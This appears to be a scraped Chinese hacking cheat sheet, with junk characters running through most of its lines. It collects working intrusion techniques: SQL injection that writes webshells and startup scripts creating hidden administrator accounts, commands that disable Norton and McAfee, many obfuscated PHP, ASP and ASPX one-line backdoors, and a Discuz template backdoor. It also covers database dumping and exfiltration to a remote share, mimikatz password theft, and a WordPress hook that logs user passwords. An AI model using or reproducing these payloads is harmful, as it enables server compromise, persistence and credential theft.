SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a+ ?! [. ]! C/ P) Y9 ]; j6 H
access中导出shell% I6 M9 A. y1 e. Q4 `4 ^* P
5 j- `5 L1 b1 c- B* F' s1 D. H+ Q
中文版本操作系统中针对mysql添加用户完整代码:& X6 w7 E3 a+ b/ Q& W5 \6 O
& _. x: y1 y4 B
use test;9 m. A. c+ N* j
create table a (cmd text);! C; J8 G* ?& f S$ x2 X
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
) Q, F1 l. E' O& j: @. E3 T. ?insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );4 f; O( p/ _! Z6 N( \/ C/ l7 m5 R
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );5 E, ~& ^+ `# \
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";! s: `7 m4 z6 r) J$ K) [; H) g4 ?) E
drop table a;
$ R( r& K1 t/ d/ G; q5 s. h- t5 i! r- `4 ?
英文版本:
/ s8 Z& R' g E2 ^8 L) {
, {" U P5 q# X2 z/ h, a+ n2 iuse test;
A- z# o. k, ]3 n' c. y. s" tcreate table a (cmd text);
/ g- F n7 J( [. b0 Linsert into a values ("set wshshell=createobject (""wscript.shell"") " ); F) Q8 V# c2 {, c8 B
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );3 o" V; v+ d I3 S6 o
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );4 A4 [1 G3 t0 K1 F0 r. u8 m
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";' a: d. W# }" `9 T" e
drop table a;
& N, x! ^$ x3 i3 a" l6 t ~# ~( }: w: U
create table a (cmd BLOB);! W2 p$ U+ i+ q* m9 H
insert into a values (CONVERT(木马的16进制代码,CHAR));. p3 J& v6 B; I0 M- @2 N+ x% v
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
, r6 _- w Z7 s) R4 o" {drop table a;+ A! k% k- K" X+ ~) _# M
4 Y$ N4 M6 u& s' i# Z: n' @记录一下怎么处理变态诺顿
$ D4 Y1 B O# ]9 }查看诺顿服务的路径' h0 ?9 J; A5 R. J8 U5 t
sc qc ccSetMgr
4 L+ [& D, y% q P' Y) c" a& o; C然后设置权限拒绝访问。做绝一点。。
( |/ A: @ I8 {, L4 F& Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system9 I: h! p$ C1 ?3 Y$ o
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"- ^& Q6 i8 u7 `' x7 u* X% L% X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
: w5 [0 o( ~) A- K5 i) J" r9 ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone9 C1 Q+ J4 }+ N+ Q' N
( [- \7 W3 L5 j$ K/ |
然后再重启服务器7 V. L" e% _/ Y7 I# V
iisreset /reboot
( G4 h0 P* x1 R这样就搞定了。。不过完事后。记得恢复权限。。。。
0 q5 E) T- g: _$ Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F" n m( x: k' i9 o7 U
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F7 r. P1 S2 {: x0 ~+ D1 H8 @4 X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F& p; h& M! J9 _6 k0 G( D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F# m; t& S. L- ?4 ]
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
( Z3 N( E3 ?2 O6 Y2 v
+ w* B* |; C6 Q' gEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')3 ?, Y* q0 I5 f
! P' k/ H! H0 |8 k3 M5 L3 R
postgresql注射的一些东西( `; l2 @( v) F% g# r$ ~* g
如何获得webshell& R8 M3 a0 P" G& N" H' a& y! Y
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
7 \" y" c" E" W' @( u- Chttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
: B7 ?: k% V) `: d1 Fhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
. w" `) |+ W3 ?8 t! p. ^2 [( L如何读文件
' E; h# [- B% ?+ p- t3 P0 Shttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
( i. c- P" Z) ~/ @- k/ K3 [* thttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;' T: f0 `/ m3 S# n( P/ L$ X. |7 G. Q
http://127.0.0.1/postgresql.php?id=1;select * from myfile;* H+ t3 W5 j6 E1 p
' g% Z. t* u/ x! z; Qz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
2 r7 g8 k4 B4 R8 S1 k J; u; p2 T当然,这些的postgresql的数据库版本必须大于8.X3 s* l( y) ^( ], j6 b
创建一个system的函数:
% ]- `/ ^, Z0 A* y, L GCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
. k7 y' x9 k! ]
' r1 ]: f- y) F3 \0 G6 [3 Y创建一个输出表:
, H# R& b3 N" G" Y& f) mCREATE TABLE stdout(id serial, system_out text)
+ ? ^5 N2 b, [6 y1 J
( w, z$ N: u( s" r I1 c执行shell,输出到输出表内:
9 [; r7 F, \0 A2 bSELECT system('uname -a > /tmp/test')' E) i3 F. ~, X
! T6 x8 t1 I" K+ Q3 e, y9 w8 d
copy 输出的内容到表里面;9 k! L: R' f4 Z9 ?
COPY stdout(system_out) FROM '/tmp/test'
( p' f4 r% F/ I5 r( n5 d% u) J. p: q
% ^4 q/ j# N3 r6 m6 p) d6 Y; U从输出表内读取执行后的回显,判断是否执行成功
$ H! o. r. K! o. Q- ]+ ^6 u; j+ {; j; |$ n
SELECT system_out FROM stdout
, ~0 Q& F2 Z& _7 x* n下面是测试例子) l$ ]4 o3 G, b8 w. c" x, }
, T, m- {- ?: l# X! p4 a
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 3 C5 o/ F- r( ?6 K, V+ g, W
( M1 Z& l6 h. @! Y/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
; o7 {% W* b! t) o) eSTRICT --( b& n' s, c( {0 m, U7 h
& `- M( J7 l# m: X, ^
/store.php?id=1; SELECT system('uname -a > /tmp/test') --) s8 r* E0 s# r% {* m T1 S
$ r& W+ {" S( D" E, w$ J% E- M
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
: b9 a4 m; Q: z& \* d o3 b) `6 a( B5 {; ~4 N7 d
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--6 j( b E* o2 t
net stop sharedaccess stop the default firewall
; `/ f- t' h% d* ynetsh firewall show show/config default firewall
/ b2 c& z/ \+ f# w/ D& |netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall9 p e7 e. A4 F9 d
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
: `) U; r3 w3 [$ j; |( O6 ^3 {, `修改3389端口方法(修改后不易被扫出)
* I% f; V5 k2 l1 q) y& r) t. {修改服务器端的端口设置,注册表有2个地方需要修改3 o% O5 _7 W& f h1 K. q. l& I
, h, K/ J# \3 @& F
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" }# O2 Z4 Z1 f: @* GPortNumber值,默认是3389,修改成所希望的端口,比如6000
7 _" M2 L5 y$ G0 V) X$ I5 q* u
第二个地方:8 a+ x8 Y+ e% A: A2 b- ?0 W
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
3 j/ U& s8 w# M% f7 C* sPortNumber值,默认是3389,修改成所希望的端口,比如6000
7 e; Q9 _( @7 g8 m2 i
! q* r- Q2 C' ]现在这样就可以了。重启系统就可以了6 i% w' f* u" p& g8 \4 m) w
" x e/ t' i L# W( S1 R3 W
查看3389远程登录的脚本% w& I0 _& `: t9 B% l" z' j
保存为一个bat文件
6 f4 L9 d9 W1 P+ Idate /t >>D:\sec\TSlog\ts.log
8 ]9 L1 n+ G5 l6 Mtime /t >>D:\sec\TSlog\ts.log" m# ]9 b+ Q; i3 r3 G
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log# X2 R0 A* E8 O6 V# W
start Explorer
1 r- e {3 Q3 ~5 D9 L
: \/ K4 l1 a( c/ Wmstsc的参数:
- z% P6 r0 A# O# d! \; `8 v. H6 R
0 }# M" _8 g7 V6 Y9 Q8 x远程桌面连接" D+ n4 p. s1 d
k# k/ d% B v. x6 E/ q" {
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]# j1 Z% [7 w% q; p4 T
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
8 q" S _5 w: k* \5 Z2 \% Q+ d2 [
3 ?. y+ y$ I1 z6 J4 I B* X<Connection File> -- 指定连接的 .rdp 文件的名称。
5 n# G$ X2 J* p; R/ q+ W
" l! B* T) F* R. K5 u- n" Z/v:<server[:port]> -- 指定要连接到的终端服务器。
+ U2 a+ I0 X$ H; ?' [& R$ |' y
0 g7 v3 l6 x; C# G/console -- 连接到服务器的控制台会话。: i& \2 _( R. X% a L
0 u4 |5 d1 ~! w8 b/f -- 以全屏模式启动客户端。2 Z" m6 ]8 |3 E
7 q5 @, p% S* }9 r- k6 g# ~/w:<width> -- 指定远程桌面屏幕的宽度。
, L, @8 @4 E/ [9 S l' k5 O
; I* s i+ @5 }5 B/ s/h:<height> -- 指定远程桌面屏幕的高度。/ e4 R# A+ V4 j$ [/ |1 O
/ X4 C: n4 W7 [8 E
/edit -- 打开指定的 .rdp 文件来编辑。
1 E- x( l. o* e& m
D& L" E% H# n/ f# `+ @, b/migrate -- 将客户端连接管理器创建的旧版
4 D/ x. _; Q1 y8 |+ s连接文件迁移到新的 .rdp 连接文件。6 u8 u- i+ U4 z
- p2 B5 t {: _$ }3 R/ A$ H" `5 Z: S5 U/ v' ~7 @0 E% B
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
R4 T2 ~6 [$ D' k& u; ^7 Smstsc /console /v:124.42.126.xxx 突破终端访问限制数量3 E0 P' }) S9 Z( L g; `
& T% y3 t0 u6 B( D* G/ |
命令行下开启3389) I+ q$ B' f: G% j1 P; u* z$ z1 w
net user asp.net aspnet /add
; U0 y- p1 H: H8 b0 o0 Tnet localgroup Administrators asp.net /add3 u4 z) e* }& ?' C
net localgroup "Remote Desktop Users" asp.net /add
' U- t+ f) f9 w" Z, B' p; u t6 pattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
+ U0 L x9 P. c0 |% z6 T; P2 mecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
% N, [0 L1 E/ U2 `echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 19 v! U @$ r+ w7 s+ J
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f# {- R5 y1 w% Q/ z: e) H1 Q% @3 o1 S
sc config rasman start= auto9 w) ~4 r0 n, u8 e \
sc config remoteaccess start= auto! d- [" S ]2 ?: u. v
net start rasman
. O, q/ t, Z6 }net start remoteaccess
2 L' U8 B. P8 Q$ R7 d JMedia
3 U. F% r5 g3 M. G6 ]; z0 N: U$ W* @3 k<form id="frmUpload" enctype="multipart/form-data"
( f. Y7 o7 ]/ z. yaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
1 B; H" O+ O8 ]8 P8 u( o<input type="file" name="NewFile" size="50"><br>+ |- h' m- F9 q- o. E* Z- |
<input id="btnUpload" type="submit" value="Upload">
9 `, B! v: ~- {</form># K. T: ?- z' \# J* H E
- E# E* O* h/ D0 s9 N* r8 Acontrol userpasswords2 查看用户的密码
2 b9 W6 @: x% Q8 kaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
7 @, q2 N. {% O+ w6 V# ESELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
1 h. b4 E+ M. r5 Z8 B" @: G% ~$ {5 p! L( Y M
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
$ o/ D7 J4 b$ P2 a; d测试1:
6 ?' z8 @3 e* | SSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# Z$ Y8 l6 V$ B( k6 }- _& o4 m. X4 ?7 e% u! X# h* X4 d/ L) z- M
测试2:9 k u7 m( S' l6 e+ w; K
# K* D6 p- @+ y/ H& V7 p; Pcreate table dirs(paths varchar(100),paths1 varchar(100), id int): J5 N, W" n; x/ ^8 I
7 }6 K4 p$ [* R
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--- @! Y* |" W" {2 [" S+ `
& S- f- \" u" _# r! R
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1. r' r; t% ^2 @8 R8 N
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令2 }5 R4 q" \3 l/ }+ [9 p
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;" u' \* C2 ~5 E: o* \' M
net stop mcafeeframework
1 j u- k7 `. c- I# K# `: J5 anet stop mcshield
9 n! E2 D9 b/ [2 fnet stop mcafeeengineservice
1 d7 N1 B( c: Q2 O& { z6 unet stop mctaskmanager: I' o. S1 P; a; j) k. I& P
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D6 V$ N# x: |0 x7 L
$ O% h0 u6 y: n3 w" J6 D VNCDump.zip (4.76 KB, 下载次数: 1)
: x$ C/ E( Z1 |' f# }, l密码在线破解http://tools88.com/safe/vnc.php$ h6 P. N% E! x, ]$ h/ B
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
: Y. t/ s: M- I" E$ m- e- a, o+ D! I1 N/ q
exec master..xp_cmdshell 'net user'5 L/ \( U& O" z, z7 h( M
mssql执行命令。$ R# Q5 R" d+ k; ^' \/ ?
获取mssql的密码hash查询
$ l8 y5 l, K. M4 W Kselect name,password from master.dbo.sysxlogins8 j2 g; O3 E8 w) Z- q2 P
% U1 G; ?0 c. e% T& X
backup log dbName with NO_LOG; v8 p5 H: V. s
backup log dbName with TRUNCATE_ONLY;
2 j& v1 \: l+ d; h$ ~- ]- T1 iDBCC SHRINKDATABASE(dbName);2 l! e/ T3 Y. Q9 j2 g3 X! Y. ~ G
mssql数据库压缩9 \$ |# u9 b- h9 h. d* f
. G% i! u- b6 J0 G w4 u# i8 [Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK4 n/ }5 d+ W4 g- M
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。! T0 b* ^- X3 t6 C
! F* p* s% F) n7 @
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'+ K' Q0 a- `. \0 a
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
. z! x; X! ]1 G& Q+ X. `9 X: \7 a6 W1 W
Discuz!nt35渗透要点:- R: u& |# E9 @, E5 z( t
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
( f7 d2 M0 b+ C3 {% Z, C(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
- y# m( X! h% E(3)保存。1 p! G Z; q# [8 p$ N" a/ g" D
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass3 ]0 C1 y6 d4 j* f$ D- s
d:\rar.exe a -r d:\1.rar d:\website\$ n; k6 i9 [" t; H D. D
递归压缩website( Q- n& H( {( P# b8 F7 v9 i6 [
注意rar.exe的路径
# g1 q% R, w3 K6 s( a( q* W% V8 }
: @) d `+ N0 g& ~7 `<?php$ ]. X$ N W9 c; B, v$ R2 I
& s4 q: I- A: H _9 j4 o
$telok = "0${@eval($_POST[xxoo])}";0 b$ a. n$ U x* E- |
- g* k0 _* q: }* `% N$username = "123456";$ G4 l7 K$ r/ f+ H. `) }
$ P+ x( b. y' O" S6 q# C& F7 M$userpwd = "123456";2 C" ]1 U& a! c
5 I ^4 X3 o! [) T1 f$telhao = "123456";
. _4 c# V* p, S! [1 I! B7 \1 e; l& A9 O. t$ F$ I; w3 u9 E3 Y1 }: p
$telinfo = "123456";! J* I( @2 E2 ?$ u3 \* U
3 ]7 f! O/ h5 x' f& T
?>+ j3 u4 w+ K* B. A. d
php一句话未过滤插入一句话木马. b4 f9 H! G6 z7 y/ H
! E g* S- V! B# [
站库分离脱裤技巧; a1 B2 L5 x( n" ]
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"' Z( D! u+ r5 E" q; ~' V
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
) l3 |0 G& c( Q8 r$ V9 q' K* H5 |* i条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
4 E* c6 j S% P: r! A0 a; K4 x这儿利用的是马儿的专家模式(自己写代码)。; p+ P* L# O: o% n% N6 _
ini_set('display_errors', 1);
& e- c7 s3 T1 B6 V! `. Sset_time_limit(0);
2 [, `$ `4 y% }* e, z+ B/ qerror_reporting(E_ALL);
: j- L8 k: T- Y- K$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
2 N9 @5 c- J5 c# tmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());; e3 Y& z$ u- f, B9 J
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
# X2 ^* S T6 F H0 u$ d$i = 0;$ }: N1 U! d9 {- c) }
$tmp = '';4 |! y% a' q" J+ @. ~! ]
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {; H( u6 ~0 L( I9 f" p
$i = $i+1;( t$ n% j. U5 G; {& A6 c# ^
$tmp .= implode("::", $row)."\n";
! `5 z- {0 D( h, t8 o: h1 W if(!($i%500)){//500条写入一个文件# S; z/ B( `; O
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';5 V* B5 ~8 _" c+ i( S2 ?
file_put_contents($filename,$tmp);% }8 n' p2 M" p
$tmp = '';* f" C0 x4 u8 ?+ g% {7 @% h* r
}* x/ Q. c# I% u+ [( J2 x/ S `
}
% G4 B7 V7 W" S; k( Q8 Fmysql_free_result($result);
& c! C. g+ v" i( T9 X( Z: N( c; U" p
1 k7 b5 L, W l0 \7 f
{9 F, [, |1 r, c8 l//down完后delete
$ d3 B8 h. C, ^- M* X: D
, J6 Y% G- u d; Q, P2 E: l; H4 j+ ?4 G% R" y2 p- N) J
ini_set('display_errors', 1);
, z9 i$ G6 p4 Y) t3 R/ Y% ?error_reporting(E_ALL);
% J% @. [9 g u. ~$i = 0;
. I- \* d0 V5 H/ M H" hwhile($i<32) {7 k! f: { \- A A0 ~8 d: q V2 X; }
$i = $i+1;
4 n7 I+ D) O" g e! m8 O" U2 ~, m5 N $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
2 ]7 w! d/ i) Z5 Y8 H V unlink($filename);+ j/ R" p% q2 z( D: B) l
}
7 y Y! M- H5 ?/ u f/ I6 Lhttprint 收集操作系统指纹
/ K7 _6 I( }4 g8 A% ]* `1 Q扫描192.168.1.100的所有端口$ p0 p3 o |7 o) d% k
nmap –PN –sT –sV –p0-65535 192.168.1.100
% J: X& k$ q4 b2 M' Lhost -t ns www.owasp.org 识别的名称服务器,获取dns信息2 d6 Q" d0 n+ r. f
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输; C' z1 p" q- E4 @( g& I
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
3 m1 u& o3 n3 y3 y/ G0 V9 x3 p
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
- j* | t3 |$ o7 B! q2 f1 ] C. o, n1 c/ Y j! `* c
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)! m4 n; V* K/ ^( u+ d
8 d, [* J7 ?0 I8 z; d0 ~1 P$ F7 O Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
. K4 t5 C7 t# j* U, X' s
6 U7 Z+ ~( {; i1 x$ [1 | DNSstuff: http://www.dnsstuff.com/ (有多种服务可用). s' _( \# e2 P [
* ^& D6 f: V6 Y& }9 h) Z8 S0 i9 m http://net-square.com/msnpawn/index.shtml (要求安装)0 `4 G4 C, Q* v* n" U. g
9 M% a% [" Y$ i5 \; b X$ T1 G
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
5 n1 x: p: @ u+ w0 |3 L; }: k G0 Q' M7 A
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)3 Y$ P" D; `$ M, f; s
set names gb2312
' E1 Z# f/ n! [* f. N9 Y导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。8 q7 v. U# _6 a5 g8 I6 ]7 I
J, T1 j! ?& @- k- W
mysql 密码修改
9 r6 O% W+ y% k7 z2 m& \UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 8 {- ~' L. A$ Z. V) H; T
update user set password=PASSWORD('antian365.com') where user='root';
% f* D, f4 b! Y5 M" E8 yflush privileges;0 Y& h" @+ E/ r& ?$ f
高级的PHP一句话木马后门
0 ]/ v" b) m* ~3 D5 d% ?7 X3 c: Y2 ^5 M/ L L& T0 B
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀' I( J, @4 F0 b9 J, a9 H
' m0 r& J: y9 X1、/ E! O( a3 L; E5 v
, f! o7 o9 ~ p, O) J8 X' B/ j
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
* E6 L7 _7 j" _+ T- e! ^( w& u6 `0 ~8 x# v8 s0 P- h% f6 y
$hh("/[discuz]/e",$_POST['h'],"Access");" n( o* |$ k7 V. @$ s+ _5 i
$ V. Z; ]) v7 F- C8 z
//菜刀一句话
% w9 G0 A3 u: C
$ }' S W5 f# w) _: z# X6 ~2、
/ B) ~$ }. m# l' @
1 K& i5 e* H0 Q$filename=$_GET['xbid'];
' K/ c- l- P0 w# _ u: r- @0 G8 ?" A3 x" v: C
include ($filename);
4 [) v: n2 {+ ^7 l9 ^% ?8 |2 e
3 F6 j9 O' P& h$ r//危险的include函数,直接编译任何文件为php格式运行' z* E7 R/ `4 w: L7 z7 ?3 q3 j
# T+ K+ H3 y" ?1 e; _
3、
. m2 o3 j4 B5 r" A5 v6 A3 v# L5 {7 t/ ]) M5 \2 u" p+ Z
$reg="c"."o"."p"."y";
$ n' |& B! q) c3 x' P' j3 ?8 [/ x7 u# E0 H/ }; A' r, [
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);3 j/ ^4 @1 t) ^% l
; |1 n' O7 [# ?( g//重命名任何文件$ q- X. [8 [ w2 G, [
/ Q [ C' a) p' z; U
4、4 {% I& c; { z/ M4 y1 f; C+ O
4 j/ |! l# F5 D! R9 H* z$ }; P
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
; ~& M- ^& ?6 y0 O( G9 y- H& C8 m' T, l- w, s* F0 L% k" W* J' d
$gzid("/[discuz]/e",$_POST['h'],"Access");
( H) p z3 `2 {5 Z* `! s: z* r, g% a, v9 g; t2 v3 T& o
//菜刀一句话$ r4 Y& _+ s& y# l
1 [8 F3 Y" G# R. z5、include ($uid);$ {) \9 x# J( ?; e! {% L" N
M/ Q: F) m7 M& E9 N0 V6 }# F
//危险的include函数,直接编译任何文件为php格式运行,POST 0 F9 Q9 {# |0 q) L+ ?( j
/ B( [1 ]' Z+ i% M6 c9 N
3 r# u! \1 a" Z* `6 V5 [//gif插一句话
! K" `0 J* m0 i: \4 r7 l" \6 g# j+ Z) M9 c4 C
6、典型一句话2 a, g% s9 R/ @
& T3 D+ a5 y" L/ _0 R程序后门代码
. c6 P" {$ r) [* O* I# S- ?<?php eval_r($_POST[sb])?>3 F9 j$ M. X+ P" \' `" p+ x
程序代码
: P' C' X, w* D% z<?php @eval_r($_POST[sb])?>/ ^. ?: x6 {+ \( g( A8 v
//容错代码# E# P; T% P3 Y8 d' [$ P
程序代码
4 R/ o8 g; i8 e" l* H5 P; |4 u) Y3 P<?php assert($_POST[sb]);?>9 V2 a& ^$ t' x& p5 Y& h3 v5 r
//使用lanker一句话客户端的专家模式执行相关的php语句
5 V& T$ M) G' `9 ~1 G( W程序代码8 Y$ S. v8 H, h' a* b
<?$_POST['sa']($_POST['sb']);?>
# \9 {% H5 ~) b1 N$ L程序代码
+ h; N2 W5 B2 ]9 h<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
* N% ^% _' R5 c+ s* b$ e" f程序代码$ ?' b- \/ A5 q, Q* X9 k
<?php
9 s! H& y. ^5 l3 L@preg_replace("/[email]/e",$_POST['h'],"error");8 | I. h$ s* T" T+ P
?>
! @7 ~; w8 m3 \. E$ A) k3 ]# N//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入/ ]) K$ Y. v. n+ O7 w' r
程序代码
; N# f9 h$ U7 S ^: N8 g2 |<O>h=@eval_r($_POST[c]);</O>
1 [/ F, G: K. D! ^! O ~* K, O程序代码5 l, x- K2 I5 J, Y* C; l- t
<script language="php">@eval_r($_POST[sb])</script>6 g4 u' D; v7 S9 v- b5 u) u
//绕过<?限制的一句话+ D/ \* e% v6 K2 A2 l3 Z6 q1 N1 j
$ c) X# M: g9 l& C( S
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip V; R2 Z. `) `8 J
详细用法:
4 y1 m0 O8 q9 _' V2 F1 y1、到tools目录。psexec \\127.0.0.1 cmd1 I8 x* u5 q) P' l$ W
2、执行mimikatz& E, V4 B$ l% J" ~6 q( N
3、执行 privilege::debug
4 j# [0 }# u- ?# X& b4、执行 inject::process lsass.exe sekurlsa.dll% U; A" [% C) }( A
5、执行@getLogonPasswords
9 v- k" k# M! Q7 _% \4 { @6、widget就是密码: y, k* D- q0 V9 w$ c# o
7、exit退出,不要直接关闭否则系统会崩溃。
7 F2 c B8 u3 w9 q( Y( v3 F' [/ F5 Q$ U9 B b4 o$ O$ D
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面* d ?* {' b' w6 U4 [
" J6 x3 j8 L- ^# K0 G8 O' v* y自动查找系统高危补丁9 e' Z* x' v! z$ a5 z! [% a( m
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt% ~3 G6 P5 q4 X! c9 a
( C& f* Z( n# l% {1 U7 L
突破安全狗的一句话aspx后门
. Y/ L8 o x% i/ @5 R* g- z<%@ Page Language="C#" ValidateRequest="false" %>3 h$ }" K4 ?. U5 g
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>% k6 n, ^+ ~7 ~1 z# \! c! I
webshell下记录WordPress登陆密码
/ A, c. a9 `4 u- C4 a- \. Vwebshell下记录Wordpress登陆密码方便进一步社工: e8 ^! N, n9 p2 k
在文件wp-login.php中539行处添加:
1 H, x! m. P" p. T: b// log password1 M6 g* ~/ b" R3 @" v q* e! P
$log_user=$_POST['log'];
- L* }: M$ ]; D7 b$log_pwd=$_POST['pwd'];% Z% _6 }" a- x! r* E3 q
$log_ip=$_SERVER["REMOTE_ADDR"];
% e6 S% y. {, ^& B$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;' ]6 @& ]7 a+ b
$txt=$txt.”\r\n”;
! L9 k8 v; {. i" @if($log_user&&$log_pwd&&$log_ip){
! ?% E: d. I' p* g% C4 s: q@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
2 |/ I7 Z: O& b0 n}6 g8 A) X, {8 B: e# Y
